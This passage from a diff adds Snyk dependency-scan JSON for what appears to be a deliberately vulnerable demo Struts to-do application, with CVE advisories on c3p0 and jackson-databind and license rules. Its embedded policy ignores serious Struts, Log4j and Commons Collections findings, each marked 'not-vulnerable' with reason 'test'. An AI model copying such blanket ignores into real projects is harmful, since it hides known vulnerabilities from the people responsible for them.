"org.zeroturnaround:zt-zip@1.12" + ], + "upgradePath": [ + false, + "org.zeroturnaround:zt-zip@1.13" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.zeroturnaround:zt-zip", + "version": "1.12" + } + ], + "ok": false, + "dependencyCount": 60, + "org": "austin.doll", + "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\n# ignores vulnerabilities until expiry date; change duration by modifying expiry date\nignore:\n SNYK-JAVA-C3P0-461017:\n - '*':\n reason: test\n created: '2024-07-25T12:49:20.019Z'\n expires: '2024-08-08T12:49:19.816Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n SNYK-JAVA-ORGAPACHESTRUTS-30207:\n - '*':\n reason: test\n created: '2024-07-25T12:48:35.155Z'\n expires: '2024-08-08T12:48:34.932Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n SNYK-JAVA-ORGAPACHESTRUTS-30771:\n - '*':\n reason: test\n created: '2024-07-25T12:49:09.757Z'\n expires: '2024-08-08T12:49:09.570Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n SNYK-JAVA-ORGAPACHESTRUTS-30772:\n - '*':\n reason: test\n created: '2024-07-25T12:48:38.078Z'\n expires: '2024-08-08T12:48:37.849Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n SNYK-JAVA-ORGAPACHESTRUTS-30778:\n - '*':\n reason: test\n created: '2024-07-25T12:49:14.737Z'\n expires: '2024-08-08T12:49:14.556Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: 
austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n SNYK-JAVA-ORGAPACHESTRUTS-31503:\n - '*':\n reason: test\n created: '2024-07-25T12:48:49.330Z'\n expires: '2024-08-08T12:48:49.098Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n SNYK-JAVA-ORGAPACHESTRUTS-451610:\n - '*':\n reason: test\n created: '2024-07-25T12:49:12.566Z'\n expires: '2024-08-08T12:49:12.322Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n SNYK-JAVA-ORGAPACHESTRUTS-608097:\n - '*':\n reason: test\n created: '2024-07-25T12:48:52.394Z'\n expires: '2024-08-08T12:48:52.149Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n SNYK-JAVA-COMMONSFILEUPLOAD-30401:\n - '*':\n reason: test\n created: '2024-07-25T12:49:17.345Z'\n expires: '2024-08-08T12:49:17.086Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n SNYK-JAVA-ORGAPACHESTRUTS-1049003:\n - '*':\n reason: test\n created: '2024-07-25T12:48:40.620Z'\n expires: '2024-08-08T12:48:40.431Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n SNYK-JAVA-ORGAPACHESTRUTS-6102825:\n - '*':\n reason: test\n created: '2024-07-25T12:48:43.321Z'\n expires: '2024-08-08T12:48:43.099Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: 
false\n source: api\n SNYK-JAVA-COMMONSCOLLECTIONS-30078:\n - '*':\n reason: test\n created: '2024-07-25T12:48:57.621Z'\n expires: '2024-08-08T12:48:57.394Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n SNYK-JAVA-COMMONSCOLLECTIONS-6056408:\n - '*':\n reason: test\n created: '2024-07-25T12:49:03.652Z'\n expires: '2024-08-08T12:49:03.427Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751:\n - '*':\n reason: test\n created: '2024-07-25T12:49:07.017Z'\n expires: '2024-08-08T12:49:06.669Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n SNYK-JAVA-ORGAPACHELOGGINGLOG4J-31409:\n - '*':\n reason: test\n created: '2024-07-25T12:48:54.986Z'\n expires: '2024-08-08T12:48:54.807Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720:\n - '*':\n reason: test\n created: '2024-07-25T13:04:24.344Z'\n expires: '2024-08-08T13:04:24.004Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014:\n - '*':\n reason: test\n created: '2024-07-25T12:48:46.732Z'\n expires: '2024-08-08T12:48:46.464Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n 
'snyk:lic:maven:javax.servlet:jstl:CDDL-1.0':\n - '*':\n reason: test\n created: '2024-07-25T12:42:03.254Z'\n expires: '2024-08-08T12:42:03.038Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n 'snyk:lic:maven:org.aspectj:aspectjweaver:EPL-1.0':\n - '*':\n reason: test\n created: '2024-07-25T12:42:05.981Z'\n expires: '2024-08-08T12:42:05.813Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n 'snyk:lic:maven:org.hibernate:hibernate-core:LGPL-2.0':\n - '*':\n reason: test\n created: '2024-07-25T12:42:08.720Z'\n expires: '2024-08-08T12:42:08.485Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n 'snyk:lic:maven:org.jboss.logging:jboss-logging:LGPL-2.1':\n - '*':\n reason: test\n created: '2024-07-25T12:42:18.672Z'\n expires: '2024-08-08T12:42:18.434Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n 'snyk:lic:maven:org.hibernate:hibernate-entitymanager:LGPL-2.0':\n - '*':\n reason: test\n created: '2024-07-25T12:42:10.980Z'\n expires: '2024-08-08T12:42:10.799Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n 'snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1':\n - '*':\n reason: test\n created: '2024-07-25T12:42:13.344Z'\n expires: '2024-08-08T12:42:13.100Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: 
austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n 'snyk:lic:maven:org.hibernate.javax.persistence:hibernate-jpa-2.1-api:EPL-1.0':\n - '*':\n reason: test\n created: '2024-07-25T12:42:16.421Z'\n expires: '2024-08-08T12:42:15.686Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\npatch: {}\n", + "isPrivate": true, + "licensesPolicy": { + "severities": {}, + "orgLicenseRules": { + "AGPL-1.0": { + "licenseType": "AGPL-1.0", + "severity": "high", + "instructions": "" + }, + "AGPL-3.0": { + "licenseType": "AGPL-3.0", + "severity": "high", + "instructions": "" + }, + "Artistic-1.0": { + "licenseType": "Artistic-1.0", + "severity": "medium", + "instructions": "" + }, + "Artistic-2.0": { + "licenseType": "Artistic-2.0", + "severity": "medium", + "instructions": "" + }, + "CDDL-1.0": { + "licenseType": "CDDL-1.0", + "severity": "medium", + "instructions": "" + }, + "CPOL-1.02": { + "licenseType": "CPOL-1.02", + "severity": "high", + "instructions": "" + }, + "EPL-1.0": { + "licenseType": "EPL-1.0", + "severity": "medium", + "instructions": "" + }, + "GPL-2.0": { + "licenseType": "GPL-2.0", + "severity": "high", + "instructions": "" + }, + "GPL-3.0": { + "licenseType": "GPL-3.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.0": { + "licenseType": "LGPL-2.0", + "severity": "medium", + "instructions": "" + }, + "LGPL-3.0": { + "licenseType": "LGPL-3.0", + "severity": "medium", + "instructions": "" + }, + "MPL-1.1": { + "licenseType": "MPL-1.1", + "severity": "medium", + "instructions": "" + }, + "MPL-2.0": { + "licenseType": "MPL-2.0", + "severity": "medium", + "instructions": "" + }, + "MS-RL": { + "licenseType": "MS-RL", + "severity": "medium", + "instructions": "" + }, + "SimPL-2.0": { + "licenseType": "SimPL-2.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.1": { + 
"licenseType": "LGPL-2.1", + "severity": "medium", + "instructions": "" + } + } + }, + "packageManager": "maven", + "projectId": "c13bd200-599a-4ac3-8ad7-abbf32182fdc", + "ignoreSettings": { + "adminOnly": false, + "reasonRequired": true, + "disregardFilesystemIgnores": false + }, + "summary": "150 vulnerable dependency paths", + "remediation": { + "unresolved": [ + { + "id": "SNYK-JAVA-C3P0-461018", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", + "className": "C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "c3p0:c3p0", + "references": [ + { + "url": "https://hackerone.com/reports/509315", + "title": "POC: Hackerone Report" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 4.4, + "modificationTime": "2024-03-11T09:48:53.496388Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:02:14.895852Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": 
"high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.4, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:53.496388Z" + } + ], + "description": "## Overview\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) due to missing protections against recursive entity expansion when loading XML configurations.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. 
For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nThere is no fixed version for `c3p0:c3p0`.\n\n## References\n- [POC: Hackerone Report](https://hackerone.com/reports/509315)\n", + "epssDetails": { + "percentile": "0.90102", + "probability": "0.02457", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-5427" + ], + "CWE": [ + "CWE-776" + ], + "GHSA": [ + "GHSA-84p2-vf58-xhxv" + ] + }, + "packageName": "c3p0:c3p0", + "proprietary": false, + "creationTime": "2019-09-05T16:24:58.914446Z", + "functions_new": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-04-22T22:18:26Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "c3p0", + "artifactId": "c3p0" + }, + "publicationTime": "2019-04-22T22:18:26Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:53.496388Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2", + "severityWithCritical": "high" + }, + { + "id": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", + "type": 
"license", + "title": "LGPL-3.0 license", + "semver": { + "vulnerable": [ + "[0,)" + ] + }, + "license": "LGPL-3.0", + "language": "java", + "description": "LGPL-3.0 license", + "packageName": "c3p0:c3p0", + "creationTime": "2024-06-18T02:35:42.971Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T02:35:42.971Z", + "severity": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1009829", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.6)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2798", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:47.492797Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.721313Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:03.263794Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.492797Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.721313Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `com.pastdev.httpcomponents.configuration.JndiConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2798)\n", + "epssDetails": { + "percentile": "0.77013", + "probability": "0.00519", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-24750" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-09-18T13:46:28.613692Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-09-18T13:44:12Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-09-18T16:19:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.721313Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1047324", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Srikanth Ramu", + "threedr3am'follower" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2658", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/pull/2864%23issuecomment-701026600", + "title": "GitHub PR" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:52:55.201119Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:02:44.942188Z" + 
}, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:55.201119Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to the class `ignite-jta`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. 
Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2658)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/2864#issuecomment-701026600)\n", + "epssDetails": { + "percentile": "0.75677", + "probability": "0.00464", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10650" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-11-29T12:43:11.601162Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-09-29T22:30:33Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-11-29T15:58:07.317638Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:55.201119Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + 
